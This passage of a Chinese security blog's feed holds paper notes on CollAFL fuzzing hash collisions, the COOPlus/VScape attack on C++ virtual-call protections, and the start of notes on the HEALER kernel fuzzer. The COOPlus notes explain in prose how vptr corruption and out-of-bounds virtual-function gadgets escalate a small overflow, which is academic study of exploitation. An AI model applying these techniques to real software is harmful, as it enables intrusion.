coverage，路径覆盖</li></ul><p>每种粒度各有利弊：</p><ul><li><p>块覆盖：跟踪每个块的命中次数，但<strong>不跟踪块的执行顺序</strong>。</p></li><li><p>边覆盖：与块覆盖不同，它将<strong>跟踪两个块之间的执行顺序</strong>。</p><p>同时，还跟踪每条边的命中次数，但<strong>不跟踪边的执行顺序</strong>。</p></li><li><p>路径覆盖：跟踪<strong>边的执行顺序</strong>，提供最完整的覆盖信息。但是，受限于<strong>路径长度</strong>和<strong>路径数量</strong>的规模之大，跟踪路径覆盖信息将会导致开销非常高，因此不具有可行性。</p></li></ul><p>综上，边覆盖信息在<strong>可行性</strong>与<strong>覆盖信息</strong>之间做了一个折中。但以 AFL 为例，边覆盖信息仍然可能会受到哈希碰撞的影响而导致信息丢失。即便提高 bitmap 的大小，但这仍然无法避免哈希碰撞，并且会对 AFL 的运行带来严重性能开销（因为 AFL 会经常遍历 bitmap 以获取新的覆盖率信息）。</p><p>因此接下来将说明 CollAFL 的做法，它将降低哈希碰撞问题发生的影响。</p><h3 id="2-降低哈希碰撞">2. 降低哈希碰撞</h3><p>先简单回忆一下 AFL 的 hash 计算方式：$cur \oplus (prev&gt;&gt;1)$。</p><blockquote><p>其中 cur 和 prev 为当前和上一个基础块的 ID。</p><p>对 prev 做了一个右移操作是为了区分开基础块 A-&gt;B 和 B-&gt;A 的差别。</p><p>具体的内容可以看看我之前做的笔记 <a href="https://kiprey.github.io/2020/07/AFL-LLVM-Mode">AFL的LLVM_Mode</a>。</p></blockquote><p>而 CollAFL 在原先 AFL 的 hash 计算方式上做了一些改进，它插入了一个三元组 <strong>(x,y,z)</strong> 作为 hash 计算参数（下称<strong>参数</strong>）。</p><p>边 A-&gt; B 的 hash 计算方程为：$Fmul(cur, prev) = (cur &gt;&gt; x) \oplus (prev &gt;&gt; y) + z$。</p><blockquote><p>其中 AFL hash algorithm 是 (x=0,y=1,z=0) 的一个特例。</p><p>从这也可以看出，Fmul 的计算开销与 AFL 差不多。</p><p>需要注意的是，CollAFL 为每个<strong>基本块</strong>来选择参数，而不是为边选择参数。</p></blockquote><p>CollAFL 将通过调整参数，来<strong>确保每个通过 Fmul 方程计算出的边的 hash 是不同的</strong>。若每个基本块中使用的参数均可以使得每条边的 hash 不同，那么就可以解决 hash 碰撞问题。</p><p>但需要注意的是，由于应用程序的基本块过多，因此<strong>无法遍历全部的基本块</strong>，同时也<strong>无法遍历全部的参数</strong>。因此实际上 CollAFL 在这个方程的基础之上又做了一些改进，根据以下几种不同的情况，来分别进行不同的操作，以降低 hash 碰撞的概率。</p><h4 id="a-基本块有多个前驱基本块">a. 基本块有多个前驱基本块</h4><h5 id="1-CalcFmul">1) CalcFmul</h5><p>初始时，CollAFL 将使用上述 Fmul 方程，动态计算入边的 hash。以下是 collAFL 贪心搜索合适的参数以计算 Fmul 方程的算法：</p><p><img src="/2021/11/collafl/image-20211201203136198.png" alt="image-20211201203136198"></p><p>输入参数是</p><ul><li>具有多个前驱基本块的目标基本块集合</li><li>基本块与基本块 ID 的映射关系</li><li>每个目标基本块的前驱基本块集合</li></ul><p>如果部分基本块，在有限的 xyz 参数集合中无法找到<strong>不会哈希碰撞的参数</strong>后，那么该基本块将被放入 Unsolve 集合中；如果能搜索到合适的参数，则目标基本块将放入 Solve 集合中，且搜索到的参数放入 Params 映射里。</p><p>最终，calcFmul 函数将输出以下四个：</p><ul><li>已经解决的基本块集合 Solv</li><li>尚未解决的基本块集合 Unsol</li><li>已经解决的基本块集合与参数的映射关系 Params：$BacicBlock \to &lt;x,y,z&gt;$</li><li>此时的 hash 表</li></ul><p>需要注意的是 Fmul 无法保证通过选择适当的参数来达到<strong>防止任何哈希冲突</strong>，因此 calcFmul 算法会将可能导致哈希碰撞的基本块单独保存，并使用其他方式处理。calcFmul 能保证的是，<strong>calcFmul 解决的基本块中不会产生任何哈希碰撞</strong>。</p><p><strong>Fmul 的哈希值必须在运行时计算得出</strong>。</p><h5 id="2-CalcFhash">2) CalcFhash</h5><p>接下来，collAFL 将会处理那些通过 calcFmul 算法求解后会产生哈希碰撞的基本块。对于这些无法通过 $Fmul$ 方程解决的基本块，其新的 hash 将被称为 $Fhash$，Fhash 的获取算法如下所示：</p><p><img src="/2021/11/collafl/image-20211201204328429.png" alt="image-20211201204328429"></p><p>可以看到，对于这些<strong>剩余未解决</strong>的基本块来说，<strong>随机给每个基本块的每个入边分配一个 hash 值</strong>，即是 Fhash 的求解方式。求解完成后，输出此时的哈希表以及剩余尚未分配完成的哈希。</p><p>之后，在运行时，Fhash 的值便可以通过查询先前生成的 <strong>HaspMap</strong> 表得到：$Fhash(cur, prev) = hash_table_lookup(cur, prev)$。</p><p>由于哈希表的查找比 Fmul 的算数计算慢的多，因此 Unsol 集合里的基本块数量必须尽可能地小。</p><h4 id="b-基本块只有一个前驱基本块">b. 基本块<strong>只有一个前驱基本块</strong></h4><p>若当前遍历到的基本块只有一个基本块，则在该边的结束块中，<strong>直接</strong>为该边分配一个不与其他 hash 冲突的新 hash 值：$Fsingle(cur, prev) = c$，其中 c 是一个与其他 hash 不同的常量。</p><p>这里的 hash 分配，<strong>将在给其他基础块计算完 Fmul 和 Fhash 后再来执行</strong>，以尽可能地避免哈希碰撞。</p><p>由于这里的哈希分配与运行时的基本块前后信息无关（因为此时基本块只有一个前驱基本块），因此可以直接在插桩时便硬编码进入，无需运行时再计算 hash。</p><blockquote><p>由于有大概 60% 以上的基本块只有一条前驱边，因此这样的 hash 分配将会节省 fuzz 的很多开销。</p></blockquote><h4 id="c-整体解决方案">c. 整体解决方案</h4><p>首先。<strong>确保哈希值空间大小大于边的数量</strong>，否则将无法避免哈希碰撞。</p><p>之后，根据上面所介绍的算法与步骤，执行以下操作：</p><p><img src="/2021/11/collafl/image-20211201205839792.png" alt="image-20211201205839792"></p><h3 id="3-开销分析">3. 开销分析</h3><p>不同哈希算法的开销如下：$cost(Fhash) &gt; cost(Fmul) &gt; cost(Fsingle) \approx 0$</p><p>其中，根据经验所示，大部分基础块都只有一个入边，并且 unsol 基础块的数量非常的少：</p><p>$num(Fsingle) &gt; num(Fmul) &gt;&gt; num(Fhash) \approx 0$</p><p>因此，整体上 collAFL 降低哈希碰撞的方式的实用性是比较高的。</p><h3 id="4-对间接调用的处理">4. 对间接调用的处理</h3><p>受限于静态分析的精度，一些<strong>被间接调用</strong>的基本块，可能会被错误归类为<strong>只有单个或者没有</strong>前驱基本块，影响实际使用效果。</p><blockquote><p>即被间接调用的基本块，可能在调用图上没有明显的调用入边。</p></blockquote><p>因此实际实现时，CollAFL 将会把<strong>没有被任何调用点直接调用</strong>的函数入口，标记为<strong>有多个前驱基本块</strong>的入口基本块，即按照有多个前驱基本块的方式（Fmul + Fhash）来计算 hash，强制不走 Fsingle 的这条路。</p><p>同时，CollAFL 还会将多个间接调用指令，展开为直接调用指令集合和一条间接调用指令，与 gcc 中的<strong>去虚拟化技术</strong>类似。</p><blockquote><p>gcc 的去虚拟化技术，指的是通过一系列的分析，最终将一些<strong>不确定的虚拟调用点</strong>，与<strong>确定的虚函数</strong>绑定，从而<strong>转化成了普通的直接函数调用</strong>，去除了间接虚拟调用。</p></blockquote><p>经过上述两步操作后，CollAFL将会减少那些 **被识别为只有单个前驱基本块（或没有前驱基本块）**的基本块数量。</p><p>CollAFL 的哈希碰撞降低技术只确保<strong>消除已知边的碰撞</strong>，因此受限于静态分析技术，仍然可能存在哈希碰撞。</p><h2 id="三、种子变异策略">三、种子变异策略</h2><p>该论文提出了以下种子变异观点：</p><ul><li>如果某条路径有许多<strong>未探索过的相邻分支</strong>，或者<strong>未探索过的相邻后继节点</strong>，则该路径的变异可能可以探索出新的路径</li><li>如果某条路径上<strong>存在较多内存访问操作</strong>，则该路径<strong>有一定概率来触发潜在内存漏洞</strong>，而对该路径的<strong>突变也有可能触发</strong>漏洞。</li></ul><p>并根据上述观点，给出三个评估种子权重的方程：</p><ul><li><p>探索<strong>未探索过的相邻分支</strong>策略：</p><p>$$Weight_Br(T) = \sum_{bb\in Path(T) \and &lt;bb, bb_i&gt;\in EDGES}IsUntouched(&lt;bb, bb_i&gt;) $$</p></li><li><p>探索<strong>未探索过的相邻后继节点</strong>策略：</p><p>$$Weight_Desc(T)=\sum_{bb\in Path(T) \and IsUntouched(&lt;bb, bb_i&gt;)} NumDesc(bb_i)$$</p><p>$$NumDesc(bb) = \sum_{&lt;bb, bb_i&gt;\in EDGES} NumDesc(bb_i)$$</p></li><li><p>探索<strong>存在较多内存访问操作的节点</strong>策略：<br>$$Weight_Mem(T) = \sum_{bb\in Path(T)} NumMemInstr(bb)$$</p></li></ul><h2 id="四、评估">四、评估</h2><p>评估分为两部分，分别是评估 CollAFL 降低哈希碰撞策略的效果，以及种子变异策略的效果。</p><h3 id="1-降低哈希碰撞">1. 降低哈希碰撞</h3><p>首先给出 AFL fuzz 不同项目的哈希碰撞效果，可以看到，碰撞比率还是比较高的：<br><img src="/2021/11/collafl/image-20211201214452781.png" alt="image-20211201214452781"></p><p>接下来再给出 CollAFL 哈希的效果，可以看到相比于 AFL，CollAFL 更好的利用了哈希空间，极大的降低了碰撞比率：</p><p><img src="/2021/11/collafl/image-20211201214607544.png" alt="image-20211201214607544"></p><h3 id="2-种子变异">2. 种子变异</h3><p>这是 CollAFL 分别使用三种种子变异策略运行200小时后的效果：</p><p><img src="/2021/11/collafl/image-20211201214812985.png" alt="image-20211201214812985"></p><p>可以看到，这三种变异策略均跑出了更多的 crash，取得了不错的效果。</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;现有 fuzz 大多以代码覆盖率为引导指标。以AFL为例，它使用&lt;strong&gt;映射至 hashmap 中的基于 edge 的覆盖率信息&lt;/strong&gt;来引导测试。这种覆盖率信息不太准确，因为&lt;strong&gt;只统计至 edge 层面&lt;/strong&gt;，同时还会&lt;strong&gt;产生覆盖 hash 冲突&lt;/strong&gt;，丢失覆盖率信息，给模糊测试带来一些不良限制。&lt;/p&gt;
&lt;p&gt;这篇论文提出了一个新的方式，来达到以下三个目的：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;提供&lt;strong&gt;更准确的覆盖信息&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;缓解&lt;/strong&gt;路径冲突&lt;/li&gt;
&lt;li&gt;保持&lt;strong&gt;较低检测开销&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;同时，该论文还利用覆盖率信息，提出了&lt;strong&gt;三种新的模糊测试策略&lt;/strong&gt;，加快了发现新路径和漏洞的速度。&lt;/p&gt;
&lt;p&gt;下图是一个完整 fuzz 的工作流程，其中黄色标注部分为论文所提出的&lt;strong&gt;重点思路&lt;/strong&gt;：&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;/2021/11/collafl/image-20211201164140587.png&quot; alt=&quot;image-20211201164140587&quot;&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="论文阅读" scheme="https://kiprey.github.io/categories/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="AFL" scheme="https://kiprey.github.io/tags/AFL/"/>
    
    <category term="fuzz" scheme="https://kiprey.github.io/tags/fuzz/"/>
    
  </entry>
  
  <entry>
    <title>《VScape - Assessing and Escaping Virtual Call Protections》 论文笔记</title>
    <link href="https://kiprey.github.io/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/"/>
    <id>https://kiprey.github.io/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/</id>
    <published>2021-11-29T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.795Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>这篇论文介绍了一种面向伪对象编程（COOP）的<strong>加强攻击手法</strong>，称为 <strong>COOPlus</strong>。对于那些不破坏 C++ ABI 的虚拟调用保护来说，有相当一部分的 虚拟调用保护手段易受 COOPlus 的攻击。</p><p><strong>符合以下三个条件的虚拟函数调用容易受到 COOPlus 的攻击：</strong></p><ul><li><strong>不破坏虚函数调用的 ABI</strong></li><li><strong>不保证 C++ 对象 vtable 指针的完整性（即可以被修改）</strong></li><li><strong>允许在虚拟函数调用点上调用不同的函数</strong></li></ul><p>COOPlus 本质上是<strong>代码重用</strong>攻击，它在目标虚拟函数调用点上调用<strong>符合类型但不符合上下文</strong>的虚拟函数。该调用可通过 C++ 语义感知的 <strong>控制流完整性 CFI</strong> 检测，但由于调用上下文不同，因此可能会造成进一步的利用。</p><p>除了 COOPlus 以外，该论文还提出了一种解决方案 <strong>VScape</strong>，用来评估针对虚拟调用攻击保护的有效性。</p><p>论文 + 幻灯片 - <a href="https://www.usenix.org/conference/usenixsecurity21/presentation/chen-kaixiang">USENIX security 21</a></p><span id="more"></span><h2 id="二、虚拟调用保护">二、虚拟调用保护</h2><p>在进一步学习 COOPlus 之前，我们需要了解一下现有的虚拟调用保护手法。</p><p>由于大部分 vtable 劫持攻击都涉及到<strong>纂改 vptr</strong>，因此一种简单的方式是<strong>确保 vptr 完整性</strong>，例如<strong>通用数据流完整性技术 DFI</strong>。但通常精度不高，且运行时开销较大，不太实用。</p><p>另一种方式是<strong>破坏掉了 C++ 的 ABI</strong>，例如有些保护方法将 vptr 放入单独的 元数据表中，并利用硬件功能（例如英特尔内存保护扩展插件）来确保元数据表的完整性，防止 vptr 被纂改。由于 ABI 被破坏，因此此类的保护方式会导致较为严重的兼容问题，实用性也不大。</p><p>第三种保护方式是，<strong>检查每个虚拟调用目标的有效性</strong>。这个保护方式在之前阅读的论文 《SHARD: Fine-Grained Kernel Specialization with Context-Aware Hardening》中也用到过，通过检查 vptr 指向位置的有效性，来确认调用的虚函数是否是正确的。</p><p>对于 CFI 技术来说，其解决方案均以安全性和实用性为目标。其中对于粗粒度（即不考虑C++语义或类型信息）的CFI方式来说，无法防止虚拟函数调用攻击；而细粒度 CFI 解决方案将会考虑更多的信息来提供更强的防御。</p><h2 id="三、-COOP-攻击">三、 COOP 攻击</h2><p>在说明 COOPlus 攻击之前，我们必须先说明一下 COOP 攻击，以了解 COOPlus 攻击所提出的改进点。这篇论文中对 COOP 攻击描述的不多，因此我找了一下提出 COOP 的论文，大概的看了一下。</p><p>COOP，即面向伪对象的编程。这个攻击方式在 2015 年被首次提出，直至现在其论文引用量多达三百余次。</p><p>COOP 攻击受限于篇幅，将在另一篇文章中记录。</p><h2 id="四、COOPlus-攻击">四、COOPlus 攻击</h2><p>COOPlus 攻击的目的是为了<strong>绕过 C++语法感知的 CFI 解决方案</strong>，因此其他漏洞缓解措施（例如 ASLR、DEP等等）以及其他漏洞利用手法等暂时不做考虑。</p><p>与 COOP 攻击不同，COOPlus 调用的是<strong>类型兼容的虚拟函数</strong>来绕过更强的防御。</p><p>COOPlus 攻击的条件是：</p><ul><li><strong>不保证 vptr 完整性</strong></li><li><strong>不破坏 C++ ABI</strong></li><li><strong>存在一个低危漏洞，例如一字节越界写 off-by-one</strong></li></ul><p>该攻击的原理如下图所示：</p><blockquote><p>一图胜过千言万语。</p></blockquote><p><img src="/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/image-20211130230054100.png" alt="image-20211130230054100"></p><p>通俗的说，主要攻击过程概括如下：</p><p>假设有三个类，分别是<strong>基类 Base 类</strong>，<strong>Base 派生类 S1</strong>，<strong>另一个 Base 派生类 S2</strong>。其中 S1、S2 是否也是派生关系并不重要。只要<strong>确保 S1 类和 S2 类都是从基类 Base 类中派生出来</strong>的即可。</p><ul><li><p>寻找一个<strong>派生类 S1 调用 Base 基类虚函数</strong>的函数调用进行劫持</p></li><li><p>利用给定的漏洞（例如一字节越界写）来修改<strong>派生类 S1</strong> 的 vptr 为 <strong>另一个 Base 类的派生类 S2 （简称 counterfeit 类） 的 vptr</strong>。</p><blockquote><p>即 <strong>S1 类和 S2 类都是从基类 Base 类中派生出</strong>。</p><p>而对于虚函数调用来说，由于 vcall 肯定是<strong>通过基类指针</strong>进行调用，而 <strong>S1 和 S2 都是基类的派生类</strong>，因此在 C++ 语义敏感层面将通过检查。因为<strong>从基类 ptr 调用派生类虚函数是非常正常的事情</strong>，除非保护手法非常的细粒度，否则就无法检测出这类利用方式。</p><p>个人猜测正是因为这点使得 COOPlus 可以绕过相当一部分的<strong>C++ 语义敏感</strong>的保护手法。</p></blockquote></li><li><p>接下来，由于 victim 类的 vptr 被修改为 counterfeit 类（伪造类），因此 victim 类的所有虚函数调用最终都将调用到 counterfeit 类的虚函数。</p><p>如上图所示，当被篡改 vptr 后的 victim 类对象调用虚函数 <code>func1</code> 时，它将不再调用 <code>S1::func1</code>，而是调用 <code>S2::func2</code>。</p><p>由于 S2 和 S1 的类布局不同，因此可能会存在一些 S1 所没有的字段（例如图中的 <code>memberM</code>）。</p><p>而 S1 调用了 S2 的 func1，因此将超过 S1 类对象的内存界限进行内存访问，最终造成内存越界操作。</p></li></ul><p>当 victim 类对象的函数操作可以造成内存越界后（内存越界到的对象称为<strong>中继对象 Relay object</strong>），我们便可以利用这种内存越界来精心修改 Relay object 上的字段，例如 length 等等，来进一步<strong>放大漏洞危害</strong>（最初的漏洞是一字节越界写）。</p><p>对于不同的 counterfeit 函数，大致将其分为以下几类可利用的 vfgadget：</p><ul><li><p>Out-of-bound Read</p><ul><li>Ld-Ex-PC：可以从目标内存中读取可控数据并<strong>加载进 PC</strong></li><li>Ld-AW-Const：可以将<strong>常量值</strong>写入目标内存</li><li>Ld-AW-nonCtrl：可以将<strong>非恒定且不可控的值</strong>写入目标内存</li><li>Ld-AW-Ctrl：可以将<strong>可控值</strong>写入目标内存</li></ul><blockquote><p>鉴于这四种 gadget 都分类至 OOB read，因此推测这里的 <strong>目标内存</strong> 应该指的是 victim Object 上的成员变量，或者特定其他堆空间等等。</p></blockquote></li><li><p>Out-of-bound Write</p><ul><li>St-Ptr：可以将<strong>指针值</strong>写入中继对象。若中继对象可被操作，则可以用来绕过 ASLR 等防御手段</li><li>St-nonPtr：将<strong>非指针值</strong>写入中继对象。例如将一个超大值写入至中继对象的 length 字段，造成更大范围的 OOB-RW。</li></ul></li></ul><p>COOPlus 攻击无需用到较为高危的漏洞，只需用到简单的低危漏洞即可放大漏洞影响，实用性较好。由于 victim 基类和 counterfeit 派生类通常都在同一个模块中定义，因此其 vtable 的分布也较为相近。漏洞对 vptr 一字节的改动也有可能产生另一个兼容 vptr，并成功利用 COOPlus。</p><p>但即便如此，若原始漏洞的效果较低，那么其 COOPlus 可用利用原语的条目数量也会降低。例如一字节越界写只能修改 vptr 正负偏移 255 字节左右，范围不够大。</p><h2 id="五、VScape">五、VScape</h2><h3 id="1-简介">1. 简介</h3><p>若给定<strong>一个目标程序</strong>、<strong>一个漏洞</strong>以及<strong>当前使用的虚拟调用保护方式</strong>，判断能否通过发起 COOPlus 来绕过 CFI 保护是比较艰难的，尤其是目标程序很大的时候。</p><p>这是因为若想发起 COOPlus 攻击，则需要找到适当的攻击原语元组 <strong>（vcall, victim class, counterfeit class）</strong>，同时</p><ul><li>虚拟调用所调用的函数必须是<strong>基类虚函数</strong></li><li>counterfeit 类和 victim 类均派生自某个基类，但却有不同的虚函数实现方式</li><li>可以利用漏洞来破坏 victim 类</li></ul><p>除此之外，我们还需要生成适当的输入，使得可以触发目标 vcall，接着触发 counterfeit 函数并最终导致内存越界操作，这整个过程同样也是一项较为艰难的任务。</p><p>因此 该论文提出 VSCape 这样的一个解决方案，用来自动编译候选的原语，并过滤出实用且可达的原语，辅助生成最终的漏洞利用来绕过 vcall 保护。</p><p>这是 VScape 的整体架构，接下来将分别在下面详细说明每个模块：</p><blockquote><p>这个工具虽然在实际中我们可能不会太用到，但是了解一下整体的设计也是一个学习的过程。</p></blockquote><p><img src="/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/image-20211130235053830.png" alt="image-20211130235053830"></p><h3 id="2-原语生成">2. 原语生成</h3><h4 id="Info-Collecting">Info Collecting</h4><p>VScape 将使用传入的目标程序源码，在编译期间收集与 vcall 相关的信息：</p><ul><li>虚函数调用点：记录目标程序的<strong>所有虚拟函数调用点</strong>，以及预期虚拟函数静态声明的基本接口类信息。</li><li>类布局：在编译过程中记录下<strong>所有类的布局</strong>，包括类大小，成员变量字段偏移量以及基类等等。</li><li>虚函数信息：记录每个虚函数调用点的<strong>所有符合类型的虚函数</strong>，以及每个虚函数中的<strong>最大字段访问偏移量</strong>，以便于在今后的检查中找到潜在的越界访问。</li></ul><h4 id="Primitive-Searching">Primitive Searching</h4><p>从上一步获取到的信息中，VScape 将继续筛选出可用于攻击的攻击原语元组。</p><ul><li><p>首先，VScape 将构建<strong>类继承（class inheritance hierarchy ，CHI） 树</strong></p></li><li><p>初始化<strong>全局编号</strong>， 该编号用于记录<strong>目标虚拟函数</strong>（注意不是所有虚拟函数）的版本，从0开始</p></li><li><p>在 CHI 树中运用 BFS，给每个类节点编号，以记录目标虚拟函数的版本。</p><p>若子类使用的虚函数是父类版本，则将父类的 ID 分配给子类，否则将全局编号自增1并赋给子类。</p></li></ul><p><img src="/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/image-20211201090813355.png" alt="image-20211201090813355"></p><p>这样操作后，VScape 就可以获得对应 vcall 的带版本号的 CHI 树。即最终可以形成可用的攻击原语 <strong>（vcall, victim class, counterfeit class）</strong>。</p><p>但这里存在一个问题，由于 vcall 数量规模非常的大，而且类也很多，因此这样一套搜索可能会消耗非常长的时间，不过这还是取决于具体实现。</p><h4 id="Primitive-Capability-Analysis">Primitive Capability Analysis</h4><p>在有了多组攻击原语后，接下来需要判断这些原语在漏洞利用中所能起到的作用。</p><p>正如上面将 vfgadget 分成多种类型一样，VScape 在这里也将对不同类型的 vfgadget 进行不同的处理。</p><ul><li><p>对于OOB-read，分析读取的值用作加载 PC 还是用作写入目标内存地址。如果是后者则还会通过污染分析来判断待写入的值能否被敌手控制。</p></li><li><p>对于 OOB-write，分析写入的值是否是指针，如果是则进一步查找中继对象的使用方式，来尝试找到绕过 ASLR 的地方。</p></li></ul><h3 id="3-检测原语结构">3. 检测原语结构</h3><p>在获取到大量攻击原语后，需要进一步过滤出可用的原语。</p><h4 id="Vulnerability-Matching">Vulnerability Matching</h4><p>在给定漏洞描述之后，VScape 还会了解目的堆分配器的相关信息，并过滤出那些：</p><blockquote><p>victim object 与 <strong>可触发漏洞的 buf</strong>  分配在同一个堆中的 候选原语。</p></blockquote><p>因为若分配不在同一个堆，则自然这些攻击原语将无法利用。</p><h4 id="Exploitable-Memory-States-Inference">Exploitable Memory States Inference</h4><p>若想触发 vcall 中的特定目的（例如写入数据或读取），则必须在<strong>特定内存状态</strong>下运行，例如类的某些字段必须为某些特殊值，否则将不满足 vcall 的条件判断，进而无法执行到目标位置。</p><p>VScape 将通过污点分析和符号执行来进一步确认。VScape将把 <strong>victim object</strong> 和相邻的<strong>中继对象</strong>标记为符号值，并以符号方式执行那些<strong>会越界访问到中继对象</strong>的伪造函数。</p><blockquote><p>很容易理解为什么要将<strong>中继对象也作为符号值</strong>，这是因为伪造函数可能会<strong>使用到一些越界内存上的值</strong>，而这些内存上存放的是中继对象。</p></blockquote><h3 id="4-约束求解">4. 约束求解</h3><p>在上面 VScape 已经对原语结构进行了简单的过滤，接下来仍然有三个问题需要解决：</p><ul><li>能否使控制流到达目标 vcallsite 上并执行 victim 类的 vcall。</li><li>伪造函数上的 OOB 操作能否成功执行</li><li>满足上述两点的数据约束是什么</li></ul><h4 id="Virtual-Callsite-Reachability-Testing">Virtual Callsite Reachability Testing</h4><p>首先对于第一点，VScape 通过定向 fuzz 技术，使用给定的基准测试数据，<strong>尽可能地得到一个不完整的可达 victim 函数列表</strong>。VScape 将在目标 vcallsite 后插入 callback 以记录调用的 victim function 和 testcase。</p><h4 id="OOB-Instruction-Reachability-Solving">OOB Instruction Reachability Solving</h4><p>对于第二点，VScape 把经过上面第一点处理后的 testcase 作为输入，在目标程序执行至目标 vcallsite 后保存此时的执行上下文，并让符号执行引擎在此时的上下文对<strong>伪函数</strong>进行符号执行操作，以获取<strong>执行伪函数 OOB 操作</strong>的数据依赖。</p><blockquote><p>类似的，中转对象也会被作为符号值一并用于符号执行中。</p></blockquote><h4 id="Exploit-Assembling">Exploit Assembling</h4><p>VScape 无法自动化生成漏洞利用，它必须依赖用户给定的 exploit 模板来构成完整的漏洞利用链。</p><p>用户必须手动：</p><ul><li>在 exploit 中手动操作堆风水</li><li>在 exploit 中，利用 POC 更改 victim object 的 vptr 为特定值</li><li>根据 VScape 提供的信息进行后续的漏洞利用</li></ul><p>以这个漏洞模板为例：</p><p><img src="/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/image-20211201095342891.png" alt="image-20211201095342891"></p><p>main 函数中的黑色字体函数调用是必须由人工手动完成，而红色字体的函数调用是 VScape 可以辅助完成的工作。</p><h2 id="六、评估">六、评估</h2><p>VScape 的评估主要基于三个层面：</p><ul><li>在真实世界中的 C++ 程序中，COOPlus 攻击是否实用</li><li>COOPlus 在绕过 vcall 保护机制上效果如何</li><li>VScape 在生成真实完整漏洞利用链的过程中表现如何</li></ul><p>根据 slides 中给定的结论，我们可以看到 COOPlus 攻击在大项目中比较实用。</p><p><img src="/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/image-20211201095933789.png" alt="image-20211201095933789"></p><p>而对于那些 vcall 保护机制，COOPlus 可以绕过满足既定攻击条件的保护。</p><blockquote><p>既定攻击条件，即不破坏C++ ABI，不保证 vptr 完整性以及允许在 vcallsite 上调用多个目标。</p></blockquote><p>论文中还给出了对于 PyQt 和 Firefox 的利用评估，这里不再展开。</p><p><img src="/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/image-20211201100845912.png" alt="image-20211201100845912"></p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;这篇论文介绍了一种面向伪对象编程（COOP）的&lt;strong&gt;加强攻击手法&lt;/strong&gt;，称为 &lt;strong&gt;COOPlus&lt;/strong&gt;。对于那些不破坏 C++ ABI 的虚拟调用保护来说，有相当一部分的 虚拟调用保护手段易受 COOPlus 的攻击。&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;符合以下三个条件的虚拟函数调用容易受到 COOPlus 的攻击：&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;不破坏虚函数调用的 ABI&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;不保证 C++ 对象 vtable 指针的完整性（即可以被修改）&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;允许在虚拟函数调用点上调用不同的函数&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;COOPlus 本质上是&lt;strong&gt;代码重用&lt;/strong&gt;攻击，它在目标虚拟函数调用点上调用&lt;strong&gt;符合类型但不符合上下文&lt;/strong&gt;的虚拟函数。该调用可通过 C++ 语义感知的 &lt;strong&gt;控制流完整性 CFI&lt;/strong&gt; 检测，但由于调用上下文不同，因此可能会造成进一步的利用。&lt;/p&gt;
&lt;p&gt;除了 COOPlus 以外，该论文还提出了一种解决方案 &lt;strong&gt;VScape&lt;/strong&gt;，用来评估针对虚拟调用攻击保护的有效性。&lt;/p&gt;
&lt;p&gt;论文 + 幻灯片 - &lt;a href=&quot;https://www.usenix.org/conference/usenixsecurity21/presentation/chen-kaixiang&quot;&gt;USENIX security 21&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="论文阅读" scheme="https://kiprey.github.io/categories/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="fuzz" scheme="https://kiprey.github.io/tags/fuzz/"/>
    
    <category term="virtual call" scheme="https://kiprey.github.io/tags/virtual-call/"/>
    
  </entry>
  
  <entry>
    <title>《HEALER - Relation Learning Guided Kernel Fuzzing》 论文笔记</title>
    <link href="https://kiprey.github.io/2021/11/healer/"/>
    <id>https://kiprey.github.io/2021/11/healer/</id>
    <published>2021-11-28T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.002Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>Healer 是受 Syzkaller 启发的 kernel fuzz。</p><p>与 Syzkaller 类似，Healer 使用 <a href="https://github.com/google/syzkaller/blob/master/docs/syscall_descriptions.md">Syzlang</a> 描述所提供的 syscall 信息来生成确认参数结构约束和部分语义约束的系统调用序列，并通过不断执行生成的调用序列来发现内核错误，导致内核崩溃。</p><p>与 Syzkaller 不同，Healer 不使用 choise table，而是通过动态移除<strong>最小化调用序列</strong>中的调用并观察覆盖范围变化来检测<strong>不同系统调用之间的内部关系</strong>，并利用内部关系来指导调用序列的生成和变异。此外，Healer 还使用了与 Syzkaller 不同的架构设计。</p><p>论文地址：<a href="http://www.wingtecher.com/themes/WingTecherResearch/assets/papers/healer-sosp21.pdf">HEALER: Relation Learning Guided Kernel Fuzzing</a></p><p>项目地址：<a href="https://github.com/SunHao-0/healer">github</a></p><span id="more"></span><h2 id="二、概述">二、概述</h2><p>先上一张概述图：</p><p><img src="/2021/11/healer/image-20211129200131315.png" alt="image-20211129200131315"></p><p>初始时，Syscall 描述 + 语料将被喂入 healer中，并在其中通过 Relation Learning 来获取出不同 syscall 之间的内部关系，之后可以通过生成的内部关系来达到更好的变异与生成效果。</p><blockquote><p><code>Relation</code>，在这篇论文中，指代不同 syscall 之间的内部关系。</p></blockquote><p>Healer 会将 testcase 放入 Executor 中执行，并获取执行的覆盖范围信息来更好的运行 Relation Learning 中的 Dynamic 